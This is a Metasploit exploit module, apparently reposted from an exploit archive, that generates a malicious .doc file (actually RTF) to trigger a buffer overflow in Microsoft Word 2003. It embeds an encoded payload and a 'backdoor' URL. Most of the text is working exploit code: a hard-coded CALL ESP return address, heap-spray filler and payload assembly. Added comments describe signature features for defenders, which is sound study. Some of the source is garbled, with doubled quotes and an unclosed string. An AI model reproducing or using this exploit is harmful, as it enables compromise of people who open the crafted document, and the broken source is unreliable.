标题: Microsoft Office 2003 (.doc) Command Exec and local BOF (msf)
作者: KedAns-Dz
平台: windows ( local BOF via MSF)
类型: local exploit / Buffer Overflow / Metasploit
###
##
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h |
# | KinG Of PiraTeS * The g0bl!n * soucha * dr.R!dE .. |
# | ------------------------------------------------- < |
###
##
# $Id: ms09_067_word_exec.rb | 01:59 25/01/2012| KedAns-Dz $
##
require ''msf/core''
# Metasploit file-format module: assembles a document in memory and writes it
# to disk through Msf::Exploit::FILEFORMAT (file_create). Nothing in this file
# touches the network; the written file is the artifact.
#
# Reading note for defenders: the bytes assembled in #exploit begin with
# \x7b\x5c\x72\x74 ("{\rt"), an RTF-style header, while the default FILENAME
# carries a .doc extension. That content/extension mismatch, together with the
# decoded RTF control words listed in #exploit, is what content inspection of
# generated files can key on.
#
# NOTE(review): quote characters appear doubled throughout the listing
# (''msf/core'', ''Name'' ...), and one Author entry lacks a closing quote —
# this looks like a transcription artifact of the page rather than the
# original Ruby source.
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
# Registers module metadata and the two user-facing datastore options:
#   FILENAME - name of the file written by file_create (default msf.doc)
#   URLBD    - a URL string that #exploit embeds (after Rex::Text.to_unescape)
#              into the tail of the output file
def initialize(info = {})
super(update_info(info,
''Name'' => ''Microsoft Office 2003 (.doc) Command Exec and local BOF'',
''Description'' => %q{
This module exploits a buffer overflow in Microsoft Office 2003
and Command Exec With .doc file .
},
''License'' => MSF_LICENSE,
''Author'' =>
[
''b33f'',
''g11tch'',
''KedAns-Dz
],
''Version'' => ''1.0'',
# The only reference is a bare "http://" placeholder; no advisory or CVE is
# cited anywhere in this file.
''References'' =>
[
[ ''URL'', ''http://'' ],
],
''DefaultOptions'' =>
{
''EXITFUNC'' => ''process'',
},
# BadChars reads as "''" in this listing — most likely a transcription
# artifact; the intended bad-character set cannot be recovered from the page.
# EncoderType AlphanumMixed means payload.encoded (used in #exploit) is
# alphanumeric text.
''Payload'' =>
{
''Space'' => 1024,
''BadChars'' => "''",
''EncoderType'' => Msf::Encoder::Type::AlphanumMixed,
''EncoderOptions'' =>
{
''BufferRegister'' => ''ESI'',
}
},
''Platform'' => ''win'',
# The single target's 'Ret' value is an empty string and is never read in
# #exploit (the return-address bytes there are hard-coded instead).
''Targets'' =>
[
[ ''Microsoft Office 2003 - MSWord (.doc Heap Spray)'', { ''Ret'' => '''' } ],
],
''DisclosureDate'' => ''JAN 08 2012'',
''DefaultTarget'' => 0))
register_options(
[
OptString.new(''FILENAME'', [ true, ''The file name.'', ''msf.doc'']),
OptString.new(''URLBD'', [ true, ''URL From the Backdoor.'', ''http://'']),
], self.class)
end
# Builds the output document and writes it with file_create.
#
# Layout, in order of concatenation: RTF-style header bytes, a text buffer
# with payload.encoded appended, the transformed URLBD value, a NUL byte,
# closing braces, CRLF and a final "}". The only side effect is the local
# file write at the end; no target is contacted from this method.
def exploit
# Encode the url.
# Rex::Text.to_unescape rewrites the URLBD string into an escaped form, so
# the plain URL is not what lands in the file — the escaped form is.
# NOTE(review): exact escape format (e.g. %uXXXX) depends on Rex — confirm
# against the Rex version in use before writing a signature on it.
url = Rex::Text.to_unescape(datastore[''URLBD''])
# Header File
# Decoded, these escapes spell RTF control words: "{\rt##", "\shp", "\sp",
# "\shpinst", "\shpfhdr0", "\shpbxcolumn", "\shpbypara", "{\sn ", "pFragments",
# "{\sv", ending in "}9;2;ffffffffff". This fixed prefix is the most stable
# part of every file the module emits.
file =
"\x7b\x5c\x72\x74\x23\x23\x7b\x5c\x73\x68\x70\x7b\x5c\x73\x70"+
"\x7d\x7d\x7b\x5c\x73\x68\x70\x7b\x5c\x73\x70\x7d\x7d\x7b\x5c\x73"+
"\x68\x70\x7b\x5c\x73\x70\x7d\x7d\x7b\x5c\x73\x68\x70\x7b\x5c\x2a"+
"\x5c\x73\x68\x70\x69\x6e\x73\x74\x5c\x73\x68\x70\x66\x68\x64\x72"+
"\x30\x5c\x73\x68\x70\x62\x78\x63\x6f\x6c\x75\x6d\x6e\x5c\x73\x68"+
"\x70\x62\x79\x70\x61\x72\x61\x5c\x73\x68\x20\x70\x77\x72\x32\x7d"+
"\x7b\x5c\x73\x70\x7b\x5c\x73\x6e\x20\x7b\x7d\x7b\x7d\x7b\x5c\x73"+
"\x6e\x7d\x7b\x5c\x73\x6e\x7d\x7b\x5c\x2a\x5c\x2a\x7d\x70\x46\x72"+
"\x61\x67\x6d\x65\x6e\x74\x73\x7d\x7b\x5c\x2a\x5c\x2a\x5c\x2a\x5c"+
"\x7b\x5c\x73\x76\x7b\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c"+
"\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x52"+
"\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c"+
"\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x7d\x39\x3b\x32\x3b\x66\x66"+
"\x66\x66\x66\x66\x66\x66\x66\x66"
# Buffer Overflow
# Every piece below is printable text: "\x23" is '#', "\x30" is '0', the
# 8-byte group after the 40 zeros is the ASCII digits "66433230", and
# "\x39\x30" is "90". The buffer is therefore written as hex-digit text in
# the RTF stream, not as raw binary; payload.encoded is alphanumeric as well
# (see the encoder settings in #initialize).
buf = "\x23" * 501
buf << "\x30\x35"
buf << "\x30" * 40
buf << "\x36\x36\x34\x33\x33\x32\x33\x30" # CALL ESP - WINWORD.exe
buf << "\x30\x30\x30\x30\x38\x30\x37\x63" * 2
buf << rand_text_alpha(42)   # the only non-deterministic region of the file
buf << "\x39\x30" * 18
buf << payload.encoded
# Create the doc
# doc aliases the same String object as file (no dup), so the << calls
# below also mutate file; harmless here because file is not reused.
doc = file
doc << buf
doc << url
doc << "\x00"
doc << "{}}}}}}"
doc << "\x0d\x0a"
doc << "}"
print_status("Creating ''#{datastore[''FILENAME'']}'' file...")
# FILEFORMAT mixin: writes doc under the FILENAME option — the module's only
# side effect.
file_create(doc)
end
end